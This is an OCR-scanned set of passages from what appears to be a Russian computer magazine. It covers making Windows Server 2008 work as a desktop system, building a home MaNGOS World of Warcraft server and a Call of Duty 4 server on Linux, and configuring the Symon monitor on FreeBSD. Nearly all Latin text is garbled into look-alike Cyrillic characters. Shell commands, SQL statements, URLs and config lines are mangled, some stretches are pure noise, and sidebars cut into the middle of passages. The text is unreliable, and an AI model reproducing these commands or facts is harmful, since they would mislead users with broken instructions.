У ѴѴіп2к8 и Ѵізіа довольно много общего, и большая часть 
совместимых с Ѵізіа приложений будут работать в сервер- 
ной системе. Драйвера для оборудования (в том числе, 
для 64-битной версии), написанные для Ѵізіа, нормально 
работа ют в ѴѴіп2к8. 

Для эмуляции Ѵізіа потребуется добавить несколько ро- 
лей и компонентов. Из них основной компонент — «Воз- 
можности рабочего стола» (Везкіор Ехрегіепсе). Он до- 
бавит в систему медиапроигрыватель, поддержку тем (в 
том числе, Аего), почтовый клиент, календарь и другие 
программы. Компонент активируется стандартно через 
«Диспетчер сервера» или в командной строке: 

> Зегѵегтападегстб — і Везкбор-Ехрегіепсе 

После его установки потребуется перезагрузка сервера, пос- 
ле которой мы самостоятельно подключаем и настраиваем 
нужные функции. 

Например, темы и звук реализованы посредством сервисов. 
Для их активации используем соответствующую консоль или 
командную строку: 




> Ііпкз 

• Список приложе- 
ний, поддержива- 
ющих контроллеры 
домена только для 
чтения, можно 
найти в документе 
«АррИсабонз ТЬаІ; Аге 
Кпоѵѵп Іо ѴѴогк ѴѴІІЬ 
ВОПСз» по адресу 
ІесЬпеІ.тісгозоб:. 
сот/еп-из/ІіЬга гу/ 
сс732790.азрх . 

• Полнофункцио- 
нальную пробную 
версию ѴѴіп2к8 ищи 
по адресу ѵѵѵѵѵѵ. 
тісгозоІІ.сот/ 
ѵѵіпбоѵѵззегѵег2008 . 



• Последняя версия 
МісгозоІІ Нурег-Ѵ 
Зегѵег 2008 доступна 
на странице ѵѵѵѵѵѵ. 
тісгозоІІ.сот/ 
зегѵегз/Ьѵрег-ѵ- 
зегѵег . 




> ІП^О 

• Если соберешь все 
номера «][акера», на- 
чиная с мая 2008-го, 
то найдешь хорошую 
подборку статей 
по использованию 
ѴѴіп2к8! 



> Зс сопіЕід Щіетез зІ:агЦ= аиСо 

> ЫеС зСагС Щіетез 

> Зс соп^ід аисііозгѵ з1:агЦ= аиСо 

> ЫеС зСагЦ аисііозгѵ 

Кроме Пезкіор-Ехрегіепсе, нелишними будут ѴѴігеІезз- 
Меіѵѵогкіпд, ВііЕоскег, Васкир-Ееаіигез, служба поиска 
ѴѴіпсІоѵѵз ВеагсЬ и РоѵѵегВЬеи. 

В итоге, вероятность превратить ѴѴіп2к8 в полноценную ра- 
бочую систему весьма высока. Хотя особых преимуществ от 
такого перехода нет, а единственным мотивом может служить 
желание изучать новую систему, пг 



• Подробнее о ѴѴАІК 
смотри статью «Са- 
мосборные окна» в 
позапрошлом номере 
(январь 2009). 
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Ролевая играѴѴогІсі о^ѴѴагсгагГи шутер Саіі оІОиііу завоевали миллионы 

^ ^ '1 ^ . . 

поклонников во всем мире. Увы, чтобы поиграть, на больши нств е серве- 

іШ л Зѵ,УЯ5:^ 



ров придется раскошелиться. Бесплатные сервера часто перегружены или 






попросту недоступны из дру гого региона. Так почему бы не поднять свой 
собственный игровой сервачок? ^ 




Цель проекта МаМООЗ (Маззіѵе Меіѵѵогк бате ОЦесІ; 5егл/ег. деітапдог.сот ) 
— этосозданиеальтернативной реализации сервера ѴѴоѴѴ. Сегодня доступны 
версии под Ыпих, РгееВСО и ѴѴіпбоѵѵз. Лицензия не позволяет использовать 
мангос в коммерческих целях и устанавливать публичные серверы на его ос- 
нове, но никто не запрещает настроить ѴѴоѴѴ-сервер в домашней сети. 
Существуют отдельные проекты по наполнению базы да иных мангос и напи- 
санию скриптов для уникального поведения отдельных МРС. Код МаМСОС 
является открытым, и энтузиасты предлагают огромное количество патчей, 
устраняющихте или иныеошибки. Обилие наработок, порядок ихустановки 
и прочие тонкости могут сбить с толку любого. Поэтому статья написана в 
виде пошагового руководства. 

РАЗДЕЛЯЕМ И ВЛАСТВУЕМ С МАНГОС 

Чтобы построить сервер только из свободно распространяемых компонентов, ус- 
тановкубудем производитьвиЬип1:и8.041Т5(хотя многое изсказанногоактуально 
и для других Ыпих-дистриб^ивов). Сначала инсталлируем пакеты, необходимые 
для получения діЦСѴМ-архивов и сборки приложений. Та к как для хранения игро- 
вого мира используется МуССипоумолчанию) или РозІдгеССІ, ставим соответс- 
твующие пакеты. Также, нужны заголовочные файлы ОрепССІ и сервера БД. 

$ зисіо арЦ-деС іпзРаІІ ІіЬззІ-сіеѵ тузді-зегѵег тузді- 
сііепр 1іЬтузд1с1іепРІ5-сіеѵ аиРосопП аиРотакеІ . 9 ІіЬРооІ 
ЬиіІсі-еззепРіаІ зиЬѵегзіоп раРсй гІіЬс ІіЬсб діР діР-соге 
2 ІіЬс 

Создаем рабочий каталог: 



$ тксііг зоигсе; ссі зоигсе 

Сейчас предстоит сделать первый выбор: ссылки проекта ведут, как мини- 
мум, на две версии сервера. На момент написания этих строк в 5ѴМ (и дТ) 
была версия 0.13, которая поддерживает новую версию клиента 3.0.3 (ЬиіШ 
9183) и старого 2.4.3. Стабильный релиз МаМСОС 0.12 поддерживаеттолько 
2.4.3 версию клиента. Будем работать с 0.13, но в установке особой разницы 
нет. Получаем исходный КОД: 

$ зѵп со кРРр : / /зѵп2 . аззетЫа . сот/зѵп/тапдоз-зѵп-тіггог 
Или через дТ: 

$ діР сіопе діР : / /діРкиЬ . сот/тапдоз/тапдоз . діР 

Теперь нужно скачать расширение 5сгірШеѵ2 [ 5бпеІ:/рго]есІ:5/5сгірІ:беѵ2 ]. 
Оно обеспечивает работу скриптов, предназначенных для создания игро- 
вых объектов, персонажей и квестов: 

$ тксііг тапдоз/згс/Ьіп(ііпдз/ЗсгірЦВеѵ2 

Название каталога должно быть именно 5сгірЮеѵ2, никаких зсгірІбеѵЗ или 
5сгір1;беѵ2! Получаем копию: 

$ ссі тапдоз/згс/Ьіп(ііпдз/ЗсгірЦВеѵ2 

$ зѵп со кРРрз : / /зсгірр(іеѵ2 . зѵп . зоигсеПогде . пек/ 
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смпиеп ііч й»п іп «копзі (в мнич р«г»іп*піі; ып> 
1^гоп|^«Б . ѲніТуре 

В.ап 1 :Ие ІР ог ассшлпі «і гізі-йП Івдіп Іа 
|>е?аиг^Е @ <&ж 

1 Ассоипі] 



І09ІгЛв(гі>не1пТа > "Ш.Й.в Л;Э^ІЭ&; гооГ^ввпдс»; геаіай' 
ІВ^ІГ ■ '■■ 

Мэ)^1гчТ1*! - Э0 
Че*1.і|6*ГѴ*Я*0ГІ = 3724 
ВІГХЯР - "0,9. в, в' 

Р1в=11в * ■■ 
іо^*ѵ«г ■ 0 
ІвдТія» Ш 0 
ІоІРіІе ■ ■Йеа'ІпбЛод" 

ІодТіпеа^аяр - 0 
іо^авісмчі. = 0 
іо^оіог* - ■■ 



» ЗУН/АСК 



І 0« Шр и 

Екіг ■ 



1^ГІМ0иТ 

ІІІБІІГу 



! П*МІ РІІ* 
ИГИГВ ІБ 



В РГІѴ 

Нехі: Раде 



І СиН Т*А1 
ЦпСик ТеяЬ 



І СііГ Рй« 
Та 5 регі 



Правим конфиги" 



ТМ1«71ІІіа'Гс«ЬКМ^П%І0МЭМі^1Ч 9 
ыутшті99*л0кооош і 
>Е— іхтугшійіюйотю*— йгт>А>йг04і • 



м •Лйй 

шм% о • 

»м^т>і«іп то«і о • 

%пм% о о 



ЗѴПГООІ: / зсгір^сіеѵ2 



|В геаітсі по умолчанию четыре учетные записи] 



$ гт -г оЬ^сіі^ 

СОЗДАЕМ БАЗЫ 

Для создания баз и таблиц сервера используем заготовки, находящиеся в 
подкаталоге 5ц[ дистрибутива: 



Патчим: 



$ тузді -и гооС -р < зрі /сгеа1:е_тузр1 . зрі 



$ діС арріу згс/Ьіпсііпдз/Зсгір1:Веѵ2 /раСсІіез/МаЫСОЗ-2008- 
12-22-ЗсгірСВеѵ2 .раСсІі 

Или по старинке: 



В результате будет создана база тапдоз, администратором которой являет- 
ся пользователь тапдоз с паролем тапдоз: 

$ саВ зді /сгеаВе_тузд1 . зді 



$ раВсІі -рО < згс/Ьіп(ііпдз/Зсгір1:Веѵ2 /раВсІіез/МаШОЗ- 
гб7б5-ЗсгірВВеѵ2 .раВсІі 

При получении файлов через діі; есть один каверзный момент. Если в ката- 
логе згс/Ьіпбіпдз лежит файл .дібдпоге: 

$ саВ згс/Ьіп(ііпдз/ . діВідпоге 
ЗсгірВВеѵ2 

— то эту строку нужно закомментировать, иначе 5сгір1:Веѵ2 собираться не 
будет. Чтобы обновить все файлы для компиляции, вводим: 

$ ссі -/зоигсе/тапдоз 
$ аиВогесопВ --іпзВаІІ --Вогсе 
$ асіосаі 
$ аиВоІіеасіег 
$ аиВосопВ 

$ аиВотаке --асісі-тіззіпд 

$ аиВотаке згс/Ьіпсііпдз/ЗсгірВВеѵ2 /МакеВіІе 

Если попытаться сконфигурировать в текущем каталоге, получим ошибку, 
поэтому: 

$ тксііг оЬ^(іі^; ссі оЬ^сіі^ 

$ . /сопВідиге --епаЫе-сІі --епаЫе-га 

Так мы подключили удаленное администрирование (--епаЫе-га) и ко- 
мандную консоль (--епаЫе-сІі). Чтобы не искать файлы повеем катало- 
гам, можно использовать стандартные ключи --ргеВіх, --зузсопВсііг и 
--йаВасііг. Чтобы задействовать базу РозІдгеВОЕ, дополнительно укажи 
параметры «--ѵ\?іВ]і-тузд1=по --ѵ\?іВ]і-розВдгезд1=уез». 

Сборка и установка стандартны: 

$ таке 

$ зисіо таке іпзВаІІ 

Чистим: 



СКАЫТ ВЗАСЕ ОВ * . * ТО 'тапдоз ' @ ' ІосаІкозВ ' ІВЕВТІРІЕВ ВУ 
'тапдоз' ШІТН МАХ_0ВЕКІЕЗ_РЕК_НОиК О МАХ_СОВВЕСТІОВЗ_ 
РЕК_НОВК О МАХ_ВРВАТЕЗ_РЕК_НОиК 0; 

В рабочей системе желательно изменить пароль и ограничить доступ к 
МуЗОЕ только с локального узла (в СЬипІи и других дистрибутивах так сде- 
лано по умолчанию). Заполняем таблицы, создаем дополнительные базы: 

$ тузді -и тапдоз -р тапдоз < зді /тапдоз . зді 
$ тузді -и тапдоз -р геаітсі < зді /геаітсі . зді 
$ тузді -и тапдоз -р скагасВегз < зді /скагасВегз . зді 

И — подтягиваем базу5сгірЮеѵ2: 

$ тузді -итапдоз -р зсгірВсіеѵ2 < згс/Ыпсііпдз/ЗсгірВВеѵ2 / 
зд1/зсгірВсіеѵ2_зВгисВиге . зді 

На этом сервер к работе, в принципе, готов. Но подключаться к нему еще ой 
какрано. 

ГДЕЖЕ МОИ ОРКИ? 

Базы и та блицы созданы, но их еще нужно на пол нить содержимым, то есть 
создать будущие поля сражений и заселить их монстрами. Здесь начи- 
нается самое интересное. Проектов, реализующих нужную нам функцио- 
нальность, великое множество. ЭтоІІРВ [ЦпібебРЬ. ѵѵѵѵѵѵ.ибЫ'огиппз.ога ]. 
который можно назвать официальным, УТОВ [ уІбЬ.капеЕги ]. Бііѵегтооп 
[ рго]есІ:5І[ѵегппооп.пеі ). Зііѵег ОаІаВазе (50В, орепзѵп.сзіе.огд/ЗРВ. 
зЕпеі/ргоіесІз/збЬппапдоз ]. немецкий МаМООБ-ОВз [ зЕпеІ:/рго]ес1:з/апп- 
бЫ . ЕОВ и другие. Какой из них выбрать — единодушного мнения на этот 
счет нет и не будет. Посетить проекты рекомендую в любом случае, там 
найдешь полный список файлов, патчей, а также полуготовые сборки 
(100% работоспособности никто гарантировать не может, но все же это 
лучше, чем ничего). 

Мнепоказалисьинтересными первыедва проекта. Более стабильным мож- 
но считать РРВ (на нем и остановим свой выбор), а УТРВ — более прогрес- 
сивным. Наверняка найдутся несогласные и будут по-своему правы. 
Получаем 5ѴМ-копию РРВ: 



$ таке сіеап 
$ ссі . . 



$ зѵп со кЦЦрз : //ипіІіесісіЬ. зѵп. зоигсеІогде.пеЦ/зѵпгооС 
$ ссі ипіІіесісіЬ 
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Сервером МаМООд 




тузд1> ІІРВАТЕ 'геаітіізі:' ЗЕТ 'пате' = 'Му зирегрирег ШоѴ\ 
зегѵег' , 'асісігезз' = '192.168.1.158' ШЕЕЕ 'ісі' = ^ 

Сиегу ОК, 1 гоѵ7 аІІесЕесі (0.01 зес) ^ 



Да, еще один необязательный, но весьма желательный с точки зрения бе- 
зопасности шаг. Запрос: 



тузр1> ЗЕЕЕСТ * ЕЕОМ ' ассоипР ' ШЕЕЕ 1 ЕІМІТ 1000; 

— покажет наличие четырех учетных записей в таблице ассоипі; базы 
геаітб. Ихлучшеудалить и записать свою (например, абтіп/раззѵѵогб): 



тузр1> ВЕЕЕТЕ ЕЕОМ ассоипЕ; 

тузр1> ІМЗЕЕТ ІМТО ' ассоипЕ ' ( ' изегпате ' , ' зЕа_разз_ 

ЕазЕ' , 'дтіеѵеі ' ) ѴАЕЕЕЗ ( ' асітіп ' , ЗНАІ (СОМСАТ (ЕРРЕЕ ( ' а 
(ітіп ЕР РЕЕ ( ' раз зѵ70гсі '))),' 3 ') ; 

тузр1> риіЕ ; 

Как вариант, для редактирования таблиц можно воспользоваться одним из 
интерфейсов к МуЗОІ, вроде рЬрМуАбтіп. 



Нужный нам файл сжат НАР’ом. В поставке НЬипІи его нет, поэтому: 

$ зисіо арЕ-деЕ іпзЕаІІ ипгаг 

Распаковываем архив и заполняем базу: 

$ ипгаг е Египк/Ри11_ВВ/ивв_0 . 10 . 4_Соге_б7бб_ЗВ2_б89 . гаг 
$ тузді -и тапдоз -р тапдоз < ВВВ_0 . 10 . 4_Соге_б7бб_ЗВ2_б89 . зді 

Теперь обновляем базу до ревизии сервера. На момент написания этих 
строк в подкаталоге Нрбаіез было 7 файлов, но, поверь, это еще не предел. 
В некоторых советах предлагаютсобрать их в один файл и поставить коман- 
дой «саЕ Египк/ЕрсіаЕез/О . 10 . 4_асі(ііЕіопз/* > ирсіаЕез . зді». 
Но лучше так не делать и накатывать каждое отдельно, так как в апдейтах 
меняется структура БД, и«одновременная»установка можетвызватьошиб- 
ку. К тому же, в ирбаіез может находиться обновление не только для базы 
тапдоз, но и для геаітб, геаітіізі;, сЬагасІегз. К какой из них относится 
конкретный файл, — подскажет имя. Так, файл обновления 5632_сЬагас1егз. 
зді соответствует 5632 версии базы сЬагасІегз. Поэтому методично ставим 
обновления, ориентируясь на дату, которая может использоваться в наиме- 
новании файла, или релиз. Текущий релиз сервера узнать просто: 

$ зѵп іпЕо -/тапдоз/ I дгер 'Ееѵізіоп: ' 

Ееѵізіоп: 205 

При запуске сервера выдается ч^ь больше информации: «МаМООВ/О.ІЗ.О 
(2008-12-30 02:00:26 Веѵізіоп 6985 — 205)». В нашем случае используется 
база версии 6766 (определяем по имени иВВ_0.10.4_Соге_6766_5В2_689. 
здІІ.Тоесть, нужны всеапдейты позднееЗО. 12. 2008и версии 205/6985. Стар- 
шие обновления ставим первыми. Если при установке появилась ошибка, 
ничего страшного, пропускаем этот файл. 

Апгрейдим и таблицы для работы 5сгіріВеѵ2. Здесь все просто: 

$ тузді -и тапдоз -р тапдоз < згс/Ыпсііпдз/ЗсгірЕВеѵ2 / 
зд1/тапдоз_Еи11_зсгірЕз . зді 
$ ипгаг е Еадз/ЕАІ/ЕАІ_0 . 0 . 4_323 . гаг 
$ тузді -и тапдоз -р зсгірЕсіеѵ2 < ЕАІ_0 . 0 . 4_32 3 . зді 

И, наконец, последний шаг: заносим в геаітіізі настройки нашего сервера 
(название и ІР-адрес): 



ПРАВИМ КОНФИГИ 

После установки у нас должно появиться три конфигурационных файла: 
тапдозб.сопі, геаітб.сопі и зсгірІбеѵ2.сопІ. Все они находятся в /изг/іосаі/ 
еіс (если не использовалась директива --зузсопЕсііг). В зсгірІбеѵ2.сопІ 
настраивается только уровень журналирования, поэтому интерес для нас 
предела вляютпервыедва файла. 

$ зисіо папо/и5гДосаІ/е(с/геаІтс1.соп^ 

# Доступ к МуЗдЕ «ЕозЕпате;рогЕ;изегпате;раззѵ^ог(і;(іаЕаЬазе» 

# можно настроить подключение через сокет, такой режим работы 
считается экспериментальным 

ЕодіпВаЕаЬазеІпЕо = " 127 . 0 . 0 . 1 ; 3306 ;тапдоз ;тапдоз; геаітб" 

# Каталог и файл для журнала, а также РІВ-файл 
ЕодЕіІе = "Ееаітб.іод" 

ЕодзВіг = "/ѵаг/іод" 

РібЕіІе = " /ѵаг/гип/геаітб.ріб" 

# Порт и адрес , на котором будут приниматься соединения 
ЕеаІтЗегѵегРогЕ = 3724 

ВіпбІР = "0 . о . о . 0" 

Настройки в тапдозб.сопі практически аналогичны: 

$ зисіо папо/изг/іосаі/еіс/тапдозсі.соп^ 

ЕодіпВаЕаЬазеІпЕо = " 127 . 0 . 0 . 1 ; 3306 ;тапдоз ;тапдоз; геаітб" 
ШогІбВаЕаЬазеІпЕо = "127 . 0 . 0 . 1; 3306; тапдоз;тапдоз; тапдоз" 
СЬагасЕегВаЕаЬазеІпЕо = " 127 . 0 . 0 . 1 ; 33 Об ; тапдоз ; тапдоз ; сЬ 
агасЕегз " 

МахРіпдТіте =30 
ШогІбЗегѵегРогЕ = 8085 
ВіпЫР = "0 . о . о . 0" 

В каталоге тапдоз/сопІгіЬ/ехІгасІог находится программа АО, применяе- 
мая для извлечения карт (две версии для Еіпих и ѴѴіпбоѵѵз). Рекомендуется 
использовать виндовый вариант (АВ.ехе), — работает лучше. С одного из 
проектов поддержки (например, тапдоз. ги] скачиваем архив сбЬс-файла- 
ми и распаковываем их в/изг/ІосаІ/зЬаге/тапдоз/бЬс: 

$ об /изг/1оса1 /зЬаге/тапдоз 
$ ткбіг бЬс; об бЬс 
$ зибо ипгаг е -/бЬс.гаг 



$ тузді -итапдоз -ртапдоз 
тузд1> изе геаітб; 
ВаЕаЬазе сЬапдеб 



Коп и руем фа йлы с диска ѴѴОѴѴ в каталоге программой АВ.ехе, затем создаем 
подкаталог тарз и запускаем распаковщик. По окончании процесса пере- 
носим заполненный каталог тарз в /изг/ІосаІ/зЬаге/тапдоз. Аналогично 
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извлекаем ѵтарз, копируем в корень архива ѴѴоѴѴ каталог 
ѵтар_ех1:гас1;_а55еппЫег_Ьіп (из дистрибутива МаМООЗ) и 
запускаем находящийся внутри батник такеѵтар5_5ІМРІЕ. 
ЬаЕ В итоге получим подкаталог ѵтарз, который копируем на 
сервер в туже папку, где и тарз. 

Все готово к первому запуску мангоса: 



$ зисіо /изг/ІосаІ/Ьіп/тапдоз-геаІтсі 
$ зисіо /изг/1оса1/Ьіп/тапдоз-ѵ70г1(і(і 



В процессе запуска на консоль будут выведены диагностичес- 
кие сообщения, просмотри их на наличие ошибок. В будущем, 
для автоматизации запуска, можно написать скрипт (на ука- 
занных выше ресурсах есть готовые примеры). Да, и команды 
на боевом сервере нужно выполнятьс повышенным приорите- 
том, добавив в начале«пісе-п -20». Дляуправления сервером, 
аккаунтами, базами и прочими компонентами есть довольно 
большое количество проектов — поиск на Воигсеіогде вы- 
даст не один десяток ссылок. Например, терминал МаМООЗ 
□В Тегтіпаі ( збпе1:/рго]ес1:з/тс1Ы ]. веб-интерс|)ейсы МѴѴРѵЗ 
( тапдоз-ѵѵІ-ѵЗ.збпеІ: ). Очень популярен редактор квестов, 
мобов, объектов, предметов и прочего — Оиісе ( диісе.іпсіотіі:. 
ш)- Сейчас активно развивается проект ѴѴоІІК (МаМООВ Веіа 
Зегѵег. збпеІ:/рго]есІз/ѵѵоиктапдозЬеІ:а ]. благодаря нему уста- 
новка сервера МаМООВ можетзаметно упроститься. 

СА110Р0иТУ4 

Установка сервера для игры в СаЕ оі" Ои1:у 4 проще: нет такого 
выбора, а значит, и путаницы, но немного потрудиться все-таки 
придется. Необходимые файлы можно скачать с одного из зер- 
кал, ссылки на которые найдешь на странице іссиіиз.огд/пеѵѵз/ 
пеѵѵз.рЬр?ісІ=4095 . в ветке «Роѵѵпіоаб» сайта соб-4.ги или в фо- 
рум е ѵѵѵѵѵѵ.саиоі'б иіѵ.ги Логит (ветка «Сервера подипих»). Есть 
ссылки на разные версии в вариантах для ѴѴіпбоѵѵз и Еіпих, в 
обычной и ЕиЕ комплектациях. Сбычная версия содержит 
только скрипт и бинарник для индексирования диска, а вари- 
ант ЕиЕ — дополнительно некоторые библиотеки и пару карт. 
Помимо этого, для установки своего сервера нам понадобится 
□ѴС-дискс игрой. Создаем рабочий каталог: 



$ тксііг СОСІ4; ссі сосі4 




ЗУН/АСК 



> Ііпкз 

Сайты проектов, свя- 
занных с МаМССЗ: 

• деітапдоз.сот 

• уЫЬ.капеЕги 

♦ іоіитЛмюжіи 

• тапдоз.гц 

• тапдоз.огд.гц 



Рате Зсаппег поможет найти и выбрать игровой серве^^ 



со(і4-1іпих-зегѵег-11212 0 07 . Саг . Ьг2 
$ Саг x^ѵ:Е сосі4-1іпих-зегѵег-11212007 . Саг .Ьг2 

Получаем в текущем каталоге ряд файлов (соб4_1пхбеб, соб4_ 
[пхбеб-Ьіп, [іЬдсс_з.зо.1 , бЬз1:бс++.зо.6), которые при помощи 
«сЬтоб +х» делаем исполняемыми. 

Копируем файлы с игрового диска из каталога Зеіир/Паіа или 
из каталога с установленной игрой в соб4. Во втором случае 
получаем около 6.5 Гб файлов. Все они не нужны — копируем 
только каталог таіп с файлами, имеющими расширение .іѵѵб, 
каталоги ѵібео, Мобз (переименовываем в тобз), а также гопе 
и файл ІосаІігабоп.ІхЕ Если под рукой есть файлы локализации, 
помещаем ихвгопе. Готово! Сначалаустанавливаем и активи- 
руем а нтич ИТ- систему РипкВизІег: 

$ . /рЬзеСир . гип -е 

$ . /рЬзеСир . гип --асі(і-дате=со(і4 --асісі-дате- 

раЦІі= /ѵ7Ііеге / і /иріоасіесі/ СОСІ4 / 

$ . /рЬзеСир . гип -и 

Кстати, файл рЬзеІир.гип доступен не во всех версиях сервера, 
последний релиз можно скачать с сайта ѵѵѵѵѵѵ.рипкЬизІег.сот . 
Самое время дать команду на старт: 



Сайты проектов, 
связанных с ССВ: 

• ѵѵѵѵѵѵ.саиоі'биіѵ.ги 

• соб-4.ги 

• Іедіоп-гиз.сіап.зи 




> ІП^О 

•Поиск на 

ВоигсеЕогде.пеІ: вы- 
даст большой список 
суб проектов для 
МаМеСВиССС. 

• Сбустановке серве- 
ра СоипІегВігіке под 
Еіпих читай в Хакер 
Спец #051. 



$ зисіо . /со(і4_1пх(іе(і 



Если есть файлы поддержки русского языка, добавляем в 
строкузапуска«+зе1: Іос_[апдиаде6». Спциональноуказываем 
ІР-адрес, порт, конфигурационные файлы и прочие парамет- 
ры (кстати, активация РипкЬизІег может привести к тому, что 
зайти в игру станет нельзя — ботов она тоже убирает; если это 
так, просто не используем ее): 

$ зисіо . /сосі4_1пхсіесі +зеР сіесіісаРесі 1 +зеР 
пеС_ір 192 . 168 . 1 . 158 +зеЦ пе1:_рогЦ 28960 +ехес 
зегѵег.сГд +тар_го1:а1:е +зеС зѵ_рипкЬизСег 1 
+зеР 1ос_1апдиаде б 

Параметр «+зе1: бебісаіеб 1 » означает выделенный локальный 
сервер, «+тар_го1:а1:е» — запуск непрерывной смены карт. 
Удобнее все настройки поместить в конфиг и положить в под- 
каталог таіп. Команды пе1:з1:а1:/50скз1:а1: должны показать ак- 
тивные порты: 



В примере буду использовать обычный вариант сервера, взя- 
тый с іссиіиз.огд . Качаем архив с одного из зеркал (размер чуть 
большеЗ Мб) и распаковываем: 

$ ѵтдек -с кккр : / / Осіау . іссиіиз . огд/сосі/ 



$ зоскзСаС I дгер сосі4 

гооС соЦ4_1пхЦе 63855 24 иф4 192.168.1.158:2 8960 

На самом деле, во время игры открытых сервером портов будет 
больше (20500, 29900, 20510 и 28960). Не забываем прописать 
их в разрешающие правила файрвола. ^ 
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ЗЕВОЕУ ^АРІЕМСН^К 



АМОВЕУ МАТѴЕЕѴ 



ПУНКТ л 

6УМ0М; УДОБНАЯ СИСТЕМА МО НИТОРИНГА 



Плох тот админ, кто не контроли 

г -Р-- -■ . я. ■ г 'Г .4 



ет состояние подопечных систем. 



ІП отрачен н ое на установку даже простейшей системы мон итор инга времт 
■^упится с лихвой. Лениться в этом вопросе не стоит, да и выбор готовых^ 
решений, распространяемых под свободными лицензиями, сегодня до- 
статочно велик. Системный монитор 5утоп обладает хорошей функци- 
ональностью, весьма прост в настройках, а генерируемые им графики 
наглядны и информативны. 



УСТАНОВКА 5ѴМ0Ы 

Системный монитор 5утоп ( ѵѵѵѵѵѵ.х54аи.п[/~\л/рсІ/5Ѵппоп ] изначально был 
написан для работы с ОрепВЗО, но сейчас поддерживает еще РгееВЗО, 
МеіВЗВ и Сіпих. Распространяется под В5В-подобной лицензией, разре- 
шающей использовать каксаму программу, таки исходный код— при ус- 
ловии сохранения информации об авторских правах. Программа потреб- 
ляет минимум системных ресурсов и позволяет контролировать нагрузку 
СРВ, состояние памяти, сетевых интерфейсов, разделов жесткого диска, 
данные РР и другие параметры. Традиционно для никсов,5утоп построен 
по клиент-серверной архитектуре. В нем используется несколько утилит, 
каждая из которых выполняетсвойучастокработы. Система сбора инфор- 
мации СОСТОИТИЗ: 

• сервера зутоп — собственно системный монитор, в его задачу входит 
сбор и пересылка данных. Для сбора некоторых системных параметров, 
не требующих привилегированного доступа (СРВ, ОЗУ и других], может 
работатьс правами обычного пользователя. Поумолчанию послезапуска 
переходите сЬгооТ 

• клиента зуппих — получает потоки зутоп и сохраняет их в РРВ-файлы. 



При это модинзутихм ожет п ол уч ать и , соответствен но, на ка пли вать дан- 
ные не только с локального, но и с нескольких удаленных серверов. Для 
анализа собранных данных и выдачи информации пользователю предус- 
мотрено еще три приложения: 

• зуѵѵеЬ — набор РНР-скриптов, использующих РРВіооІ для создания гра- 
фиков на основе собранной информации. 

• зуісб — клиент, предназначенный для вывода данных о сетевой на- 
грузке текущего узла на разнообразные ВСВ-устройства (производства 
СгузІаІРопІг и НО44780]. 

• ЗутихСбепВрт — «родной» модульна Регі, в качестве примера исполь- 
зования к нему прилагается программа деізутопііет.рі. 

На просторах Сети можно найти еще ряд связанных проектов. Например, 
рЬрЗутоп [ ѵѵѵѵѵѵ.гѵапйаппегѵ.пеДѵѵогкз/ріірзѵтоп ]. как и зуѵѵеЬ, собира- 
ет данные суказанного порта и выводитих в виде красивых графиков. 
Примеры конфигурационных файлов будут даны для РгееВЗО. Впрочем, 
всесказанное,за исключением процессаустановкииособенностейобоз- 
начения устройств, актуально и для других систем. Установка при помощи 
системы портов стандартна: 
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Нто покажет Ісрсіитр^ 



# ссі /изг/рог^з/зузи^ііз/зутоп 

# таке іпз^аіі сіеап 

Кроме Зутоп, будет установлен а большая группа зависимостей, включая 
ККОТооІ. Проверяем: 

# ркд_іп:Ео I дгер зутоп 

зутоп-2.79_1 Рег:Еогтапсе апсі іп:Еогтакіоп топікогіпд 
кооі 

Все на месте! Можно приступать к настройкам. 

КОНФИГУРАЦИОННЫЕ ФАЙЛЫ 5УМ0М 

Управление зутоп и зутих осуществляется при помощи конфигурацион- 
ных файлов зутоп. сопі и зутих.сопб Копируем их шаблоны в катал ог/еіс/: 

# ср -V /изг/іосаі/зкаге/ехатріез/зутоп/* . соп^ /еСс/ 

И приступаем кразбору. Конфигурационный файл демона зутоп называ- 
ется /еіс/зутоп.сопб Правило мониторинга выглядиттак: 

топіСог гезоигсез [еѵегу] "зкгеат" [":Егот" козС] 

[ "Со" ] козС [ рогМ 

Настройки, выставленные в шаблоне, позволяют мониторить лишь че- 
тыре параметра локальной системы и отправлять результат на 21 00 порт 
локального узла (протокол ПОР): 




ла ошибка вроде: «Іаіаі: рітобиіе поІаѵаіІаЫе». Аналогичное сообщение 
будет выведено, если неправильно назван сервис для ргос или сетевой 
интерфейс. Названия процессов для ргос смотрим при помощи рз, а на- 
звания сетевых интерфейсов вспоминаются по іі'сопбд. Найти диски по- 
можетібізк или бтезд. Списоксенсоровтакже специфичен для каждого 
железа, — получить его можно при помощи команды «зузск Ьѵѵ.зепзогз». 
Чтобы упростить создание конфигурационного файла, разработчики 
предлагаютскриптс_сопбд.зЬ. Послеегозапуска получим заготовку, куда 
будут записаны настройки применительно к текущей системе (сетевые 
интерфейсы, іо разделов диска, СРП и ОЗУ): 

# /изг/1оса1/зкаге/зутоп/с_соп:Еід . зк > / екс/ зутоп. соп:Е 

Остается лишь дополнить его своими параметрами. Для полноценного 
мониторинга «боевого» сервера, на котором работает прокси, апач, демон 
серых списков, МуЗОк и01атб,пишем приблизительно такой конфиг: 

# ѵі /еіс/зутоп.соп^ 

топіког { сри ( О ) , тет, тЬи:Е , р:Е , ( зкОа) , ( зкОк) ,сі:Е(зсіОе) , 

зепзог ( ІтО . СетрО ) , зепзог ( ІтО . Сетрі ) , зепзог ( ІтО . ^апО ) , 
ргос ( здиік) , ргос (кССрсі) , ргос ( зратк) , ргос (туздісі) , 
ргос (сіатк) , 

і:Е(:ЕхрО), і:Е(:Ехр1), і:Е(:Ехр2), і:Е(РипО), 
іо ) , іо Ы<3і1 ) 

} зкгеат ко 127 .0.0.1 2100 



топіког {сри(О) , тет, І1(1о0), іо (ѵ/кО ) } зкгеат ко 127.0.0.12100 

Контролируется загрузка процессора, ОЗУ, работа интерфейса обратной 
петли и жесткого диска. Это самый простой пример. Все возможные па- 
раметры приведены в справочной странице зутоп(8). Вот только неко- 
торые: 

• сри/сриіоѵѵ — загрузка процессора в состояниях (ібіе, изег, пісе, зузіет, 
іпіеггирі:), плюс іоѵѵак для сриіоѵѵ. Максимальное значение 100, подсчет 
ведется с шагом 2. 

• 01 — статистика использования дискового пространства. 

• іі" — счетчики сетевых интерфейсов (количество принятых/отправлен- 
ных пакетов, байт, ошибки, отброшенные пакеты). 

• іо — производительность жесткого диска. 

• тет — состояние памяти и свопа. 

• рі'/рі'д — статистика пакетного фильтра РР (количество принятых и от- 
брошенных пакетов, байт) и очереди АВТО. 

• зепзог— информация с датчиков, показывающихтемпературу процес- 
сора, частоту вращения кулера и др. Тип сенсора указывается в скобках. 

• ргос — статистика процесса. 

